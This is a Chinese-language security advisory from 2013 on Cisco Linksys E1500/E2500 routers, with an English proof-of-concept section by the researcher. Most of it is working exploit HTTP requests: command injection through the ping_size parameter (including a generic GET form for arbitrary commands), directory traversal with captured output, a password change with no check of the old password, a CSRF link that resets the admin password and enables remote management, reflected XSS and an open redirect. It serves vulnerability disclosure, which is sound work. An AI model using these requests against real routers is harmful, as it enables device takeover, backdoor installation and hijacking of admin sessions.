Cisco Linksys E1500/E2500路由器多个安全漏洞

Cisco Linksys E1500/E2500路由器多个安全漏洞

发布日期：2013-02-06
更新日期：2013-02-19

受影响系统：
Cisco Linksys E1500 1.0.05 - build 1
 Cisco Linksys E1500 1.0.04 - build 2
 Cisco Linksys E1500 1.0.00 - build 9
 Cisco Linksys E2500 1.0.03
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 57760
 
Cisco Linksys E1500/E2500是使用SpeedBoost技术的无线N路由器。
 
Linksys E1500/E2500在实现上存在命令注入漏洞、安全绕过漏洞、跨站请求伪造漏洞、跨站脚本执行漏洞、目录穿越漏洞、URI重定向漏洞。攻击者可利用这些漏洞执行任意命令、钓鱼攻击、绕过安全限制、窃取cookie、访问系统和其他配置文件、在用户会话上下文中执行未授权操作。
 
1, OS命令注入。
 参数：ping_size=%26ping%20192%2e168%2e178%2e102%26
 此漏洞源于ping_size参数缺失输入验证。
 2, 目录遍历。
 参数：next_page
 3, 更改旧密码，无需输入当前密码。
 4, CSRF漏洞，无需知道当前密码，即可更改密码。攻击者可以激活远程管理。
 5, 反射跨站脚本执行。
 参数：wait_time=3'%3balert('pwnd')//
 6, 重定向漏洞
 参数：submit_button=http://www.pwnd.pwnd%0a
 
<*来源：Michael Messner （michae.messner@integralis.com）
 
  链接：http://www.s3cur1ty.de/node/655
 *>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
Michael Messner （michae.messner@integralis.com）提供了如下测试方法：
 
============ Vulnerability Overview: ============
 
OS Command Injection / E1500 and E2500 v1.0.03
 => Parameter: ping_size=%26ping%20192%2e168%2e178%2e102%26
 
The vulnerability is caused by missing input validation in the ping_size parameter and can be exploited to inject and execute arbitrary shell commands. It is possible to start a telnetd or upload and execute a backdoor to compromise the device.
 You need to be authenticated to the device or you have to find other methods for inserting the malicious commands.
 
Example Exploit:
 POST /apply.cgi HTTP/1.1
 Host: 192.168.178.199
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Proxy-Connection: keep-alive
 Referer: http://192.168.178.199/Diagnostics.asp
 Authorization: Basic xxxx
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 185
 Connection: close
 
submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=%26ping%20192%2e168%2e178%2e102%26&ping_times=5&traceroute_ip=
 Change the request methode from HTTP Post to HTTP GET makes the exploitation easier:
 
http://192.168.178.199/apply.cgi?submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=%26COMMAND%26&ping_times=5&traceroute_ip=
 

Directory traversal - tested on E1500:
 => parameter: next_page
 
Access local files of the device. You need to be authenticated or you have to find other methods for accessing the device.
 
Request:
 POST /apply.cgi HTTP/1.1
 Host: 192.168.178.199
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Proxy-Connection: keep-alive
 Referer: http://192.168.178.199/Wireless_Basic.asp
 Authorization: Basic YWRtaW46YWRtaW4=
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 75
 
submit_type=wsc_method2&change_action=gozila_cgi&next_page=../../proc/version
 Response:
 HTTP/1.1 200 Ok
 Server: httpd
 Date: Thu, 01 Jan 1970 00:00:29 GMT
 Cache-Control: no-cache
 Pragma: no-cache
 Expires: 0
 Content-Type: text/html
 Connection: close
 
Linux version 2.6.22 (cjc@t.sw3) (gcc version 4.2.3) #10 Thu Aug 23 11:16:42 HKT 2012
 

For changing the current password there is no request of the current password - tested on E1500
 With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.
 
Example Request:
 POST /apply.cgi HTTP/1.1
 Host: 192.168.1.1
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Proxy-Connection: keep-alive
 Referer: http://192.168.1.1/Management.asp
 Authorization: Basic xxxx
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 311
 
submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&ctm404_enable=&remote_mgt_https=0&wait_time=4&need_reboot=0&http_passwd=admin&http_passwdConfirm=admin&_http_enable=1&web_wl_filter=0&remote_management=0&nf_alg_sip=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0
 CSRF for changing the password without knowing the current one and the attacker is able to activate the remote management - tested on E1500:
 http://<IP>/apply.cgi?submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&ctm404_enable=&remote_mgt_https=0&wait_time=4&need_reboot=0&http_passwd=password1&http_passwdConfirm=password1&_http_enable=1&web_wl_filter=0&remote_management=1&_remote_mgt_https=1&remote_upgrade=0&remote_ip_any=1&http_wanport=8080&nf_alg_sip=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0
 Reflected Cross Site Scripting - tested on E1500
 => Parameter: wait_time=3'%3balert('pwnd')//
 
Injecting scripts into the parameter wait_time reveals that this parameter is not properly validated for malicious input.
 
Example Exploit:
 POST /apply.cgi HTTP/1.1
 Host: 192.168.178.199
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Proxy-Connection: keep-alive
 Referer: http://192.168.178.199/Wireless_Basic.asp
 Authorization: Basic xxxx
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 300
 
submit_button=Wireless_Basic&action=Apply&submit_type=&change_action=&next_page=&commit=1&wl0_nctrlsb=none&channel_24g=0&nbw_24g=20&wait_time=3'%3balert('pwnd')//&guest_ssid=Cisco-guest&wsc_security_mode=&wsc_smode=1&net_mode_24g=mixed&ssid_24g=Cisco&_wl0_nbw=20&_wl0_channel=0&closed_24g=0
 

Redirection - tested on E1500
 => Paramter: submit_button=http://www.pwnd.pwnd%0a
 
Injecting URLs into the parameter submit_button reveals that this parameter is not properly validated for malicious input.
 
Example Exploit:
 POST /apply.cgi HTTP/1.1
 Host: 192.168.178.199
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Proxy-Connection: keep-alive
 Referer: http://192.168.178.199/Wireless_Basic.asp
 Authorization: Basic xxxx
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 290
 
submit_button=http://www.pwnd.pwnd%0a&action=Apply&submit_type=&change_action=&next_page=&commit=1&wl0_nctrlsb=none&channel_24g=0&nbw_24g=20&wait_time=3&guest_ssid=Cisco01589-guest&wsc_security_mode=&wsc_smode=1&net_mode_24g=mixed&ssid_24g=Cisco01589&_wl0_nbw=20&_wl0_channel=0&closed_24g=0

建议：
--------------------------------------------------------------------------------
厂商补丁：
 
Cisco
 -----
 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
 
http://tools.cisco.com/security/center/home.x